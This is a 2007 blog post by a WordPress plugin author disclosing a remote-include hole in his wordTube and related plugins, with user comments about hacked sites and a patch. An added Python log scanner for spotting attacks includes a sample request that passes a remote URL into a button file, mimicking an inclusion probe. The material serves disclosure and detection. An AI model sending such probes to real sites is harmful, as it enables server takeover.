BIG security issue!

My plugins got hacked, in the same way as myGallery:

http://weblogtoolscollection.com/archives/2007/04/30/please-update-mygallery-plugin/

I have updated all plugins (except NextGEN Gallery, which is safe); please update now to the latest version!

Please check your server log for external access to:

  • wptable-button.php
  • wordtube-button.php
  • myflash-button.php

If you find any, I recommend deleting the file; the TinyMCE button will not work, but that is better for the moment.
I am analysing at the moment what information they have already taken from my site. I hope this is not a bigger problem, but over the next days this page may be offline from time to time…
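One way to do that log check, as an added example (not the author's code): it scans Apache combined-format lines for hits on the three button files and reports the ones that did not come from the site's own editor. The site host name, the referer heuristic and the remote-URL-in-a-parameter check are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The three button scripts named in the post.
BUTTON_FILES = ("wptable-button.php", "wordtube-button.php", "myflash-button.php")

# Apache "combined" log format (assumed for the constructed sample lines below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def suspicious_requests(lines, own_host="example.org"):
    """Return requests that reach one of the button files from outside wp-admin.

    A foreign or missing referer marks a hit "review" (referers are easy to
    forge, so this is a prompt to look, not proof); an absolute URL in any
    query parameter, the value a GET-controlled include would be fed, marks
    it "high". Both heuristics are assumptions added here, not from the post.
    """
    findings = []
    for m in filter(None, map(LOG_RE.match, lines)):   # skip non-matching lines
        path, _, query = m.group("target").partition("?")
        if not path.endswith(BUTTON_FILES):
            continue
        ref_host = urlsplit(m.group("referer")).hostname or ""
        remote_url_param = any(
            v.lower().startswith(("http://", "https://", "ftp://"))
            for _, v in parse_qsl(query, keep_blank_values=True)
        )
        if ref_host != own_host or remote_url_param:
            findings.append({
                "ip": m.group("ip"),
                "file": path.rsplit("/", 1)[-1],
                "status": int(m.group("status")),
                "severity": "high" if remote_url_param else "review",
            })
    return findings

# Constructed sample log lines (not real data); the third carries a remote URL
# in a parameter, which is what a GET-controlled include would accept.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/May/2007:10:01:12 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php HTTP/1.1" 200 512 "http://example.org/wp-admin/post.php" "Mozilla/5.0"',
    '10.0.0.5 - - [03/May/2007:10:02:40 +0200] "GET /wp-content/plugins/wordtube/video.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [03/May/2007:11:15:03 +0200] "GET /wp-content/plugins/wordtube/wordtube-button.php?p=http://203.0.113.9/x.txt HTTP/1.1" 200 1024 "-" "libwww-perl/5.8"',
    '198.51.100.4 - - [03/May/2007:12:20:51 +0200] "GET /wp-content/plugins/wp-table/wptable-button.php HTTP/1.1" 404 0 "-" "Mozilla/4.0"',
]
```

Run it over your real access log with `suspicious_requests(open("access.log"))` and your own host name; a 404 on one of these files still tells you someone is probing for the plugin.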

Sorry for all the problems. I was not aware of this when I programmed the plugins; I will do my best that this never happens again.

Here are the hacks:

http://www.milw0rm.com/exploits/3825

http://www.milw0rm.com/exploits/3824

http://www.milw0rm.com/exploits/3828


31 thoughts on “BIG security issue!”

  1. Luis says:

    Alex,

    Is there anything to do to make NextGen Gallery safer? That is the only one I’m using so far.

    Thanks,

    Luis

  2. alakhnor says:

    Thanks for the warning, Alex. So, as I understand it, you just changed the way the path goes through the buttons to fix it (i.e., the very top of the PHP)?

  3. alex.rabe says:

    I removed the include via the GET variable. This idea I took from another plugin; I never felt it was a good way, but I never supposed that it was a possible backdoor.

    For my new plugin I already changed it, and I hope and pray that I did it in a better way…

    I’m terribly shocked that this happened…

  4. alakhnor says:

    This sounded strange to me when I went through the code. It should have rung a bell. No sweat! It’ll soon be past 😉

  5. daveslocombe says:

    Our site has been hacked – I believe through wordtube – I started a new thread on this topic. Damn stressful, just lost our business website and email.

  6. gregg says:

    Our site has also just been hacked through wordtube…

    I am installing a fresh wordpress install now…

  7. serge says:

    Hey, I’ve been hacked too.
    I’ve solved the problem:
    in wordtube-button.php
    – remove if $_GET…
    – and put:
    $wppath = preg_replace('`^(.*)(/wp-content/(.*))`', '$1', $_SERVER['SCRIPT_FILENAME']);

    in wordtube.php lines 313 to 315
    function wpt_buttonscript() {
    window.open("'.WORDTUBE_URLPATH.'wordtube-button.php", "SelectVideo", "width=440,height=220,scrollbars=no");
    }

  8. iSightseeing says:

    […] as I just learned by email (thanks to Majoran and Alexx), there is a security hole in the WordPress plugin […]

  9. gregg says:

    Do I need to make this change to the code even if I have updated to the latest version of the plugin…

    My site has had all pages deleted, random empty posts scattered throughout and a few Hacked By messages…

    bastards

  10. alakhnor says:

    Version 1.44 is safe. You shouldn’t need additional code with it. In fact, the change in it is similar to what Serge has given.

  11. […] wordTube asks that the wordTube plugin be updated immediately, and also, to neutralise that bug, http://alexrabe.de/?p=110 the vendor at the same time proposes deleting the file […]

  12. raniya says:

    My website got hacked. For two days I have been crying… my host says I should take the plugin out altogether… I just don’t know what to do.

  13. Bailey says:

    Backup, backup, backup………… people, you can’t be running BUSINESS websites without keeping frequent backups. It’s not your host’s responsibility, it is YOUR responsibility. That’s part of running a website!!!

    Now that said… if the plug-in is crackable… UNINSTALL IT. Really, it is as simple as that. Never hang your hat on a plug-in. WordPress is your main tool, do your best to “hack around” a solution in the meantime until patches are released by Alex.

    But Alex — DO NOT freak out about this. You have been doing your best here. People accept a certain liability when they install a 3rd-party plug-in… it might be insecure. It might be opening them up to having their site destroyed. This is the risk we undertake. 😉 Kudos to you for being concerned about it, but, don’t beat yourself up over it. We users accept the liability when we modify the base WordPress. Cracks happen. 😉

  14. Ted says:

    As a web host with a server that got compromised by this, I’d like to say thanks for getting on this so very quickly!

  15. Ruben says:

    My website also got hacked and my server has been down a few times pretty hard, with a server load that went from 0.5 to 80 in 20 seconds as soon as the server was rebooted. They had full root access on the dedicated server and were misusing it pretty well…

    Please note that disabling the Wordtube Plug-in may not be enough, delete the plug-in to make sure they can’t request or find the wordtube-button.php by using the inurl: search on Google.

    Pity I can’t use the plug-in any more, I loved it and we used it on a nearly daily basis…

  16. Ruben says:

    Oh and Alex, the payoff of your website is: learning by doing. I guess the only ones who can be blamed are the idiots that are misusing a mistake made by somebody else. We’re all just learning by doing. My lesson? Keep focused on backing up, I had some luck this time.

  17. […] Luckily nothing was deleted and after some trouble I was able to get my page working again.  For those of you using the wordtube plugin: Upgrade now (if you haven’t done that already)! Read this. […]

  18. SS says:

    Found two large files in the wordtube directory but nothing else wrong with the website – as far as I can see. Maybe they got bored by the time they got to me.

    Phew!

  19. […] but the mistakes that made the attacks possible: programming errors in the plugins Wordtube and myGallery. Anyone using these should update to the latest version as quickly as possible […]

  20. […] Workaround found (update of the plugin to version 1.44 and deletion of a file: see here) […]

  21. Hacked of London says:

    These are really basic XSS attacks. Maybe you should learn to program before you release stuff in future.

  22. alex.rabe says:

    See my motto… learning by doing
    You can trust me, this will not happen a second time 🙂

  23. boris says:

    I experienced the security problem first-hand.. er, on my own server, and wanted to say something on the topic.. but I see: the problem is known and solved. Excellent 🙂

  24. […] Let me put it this way: please make sure that the plugins of your WordPress installations are up to date. If you use them at all. But also otherwise, because otherwise silly things happen… […]

  25. […] seems like one file of the wordtube plugin was open to GET exploits. I removed the file now, changed all passwords (ftp, sql, wordpress, mint) and hope that I won’t receive another suspicious email. If you use the same plugin, do so as well (instructions are here). […]

  26. wilsen says:

    Hi Alex,

    things like that happen! I appreciate that you acted that quickly and that you mind your plug-in. But “Hacked of London” is right. Because of that I want to recommend this book:

    http://www.amazon.de/PHP-Sicherheit-PHP-MySQL-Webanwendungen-sicher-programmieren/dp/3898644502/ref=cm_taf_title_featured?ie=UTF8&tag=tellafriend-20

    This book really kicks ass! And if you don’t already know it, it will help you to develop more of these wonderful plug-ins for us 😉

  27. […] but this is also a growing risk that hackers and bad guys review again the code and find another security problem. I fear the day when my plugin is listed on milworm… I do my best to review my own code, but […]

  28. […] used for DoS attacks against a Brazilian server. The affected plugin was WordTube by Alex Rabe. In early May this problem had already been reported on several sites and blogs. Through […]

  29. KC says:

    I’m seeing today in the logs that someone (a botnet?) is guessing that I have this plugin installed (and some others too). I notice that this happens time to time — they check on whatever wordpress installations they can find and see if someone hasn’t updated.

  30. alex.rabe says:

    This has been ongoing since May; my page still receives 100-200 attempts each day…
